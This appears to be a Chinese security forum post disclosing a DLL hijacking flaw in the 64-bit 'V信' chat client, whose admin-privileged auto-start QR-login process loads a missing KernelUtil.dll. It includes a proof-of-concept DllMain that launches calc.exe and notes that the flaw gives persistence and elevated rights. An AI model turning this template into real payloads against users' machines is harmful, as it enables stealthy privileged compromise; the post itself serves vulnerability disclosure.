V信最新64位版本（其实很久前就已经有了）存在KernelUtil.dll加载Dll劫持漏洞，该Dll本不存在安装包中，黑产可能会利用此漏洞dll劫持产品启动过程，进而执行恶意代码。

然而V信的扫码登录进程是以管理员权限开机自启动的，很多人都不会选择关掉这个自启动项。相信杀软也不敢拦截这款聊天软件的组件。

其实在TM的安装文件夹下是存在KernelUtil.dll这么个东西的，V信的安装目录不存在该Dll，但是扫码登录进程运行的时候会去加载这个不该存在的Dll。

在Process Monitor中可以看到如下图所示。

随意建立一个Dll项目写上一个加载验证的代码，编译出DLL，拷贝到软件的安装目录下，重启软件即可验证缺陷。

#include "pch.h"

#include <stdlib.h>

BOOL APIENTRY DllMain( HMODULE hModule,

                       DWORD  ul_reason_for_call,

                       LPVOID lpReserved

                     )

{

    switch (ul_reason_for_call)

    {

    case DLL_PROCESS_ATTACH:

        system("calc.exe");

        break;

    case DLL_THREAD_ATTACH:

    case DLL_THREAD_DETACH:

    case DLL_PROCESS_DETACH:

        break;

    }

    return TRUE;

}

这样一来，自启动和权限的问题就解决了。

[培训]内核驱动高级班，冲击BAT一流互联网大厂工 作，每周日13:00-18:00直播授课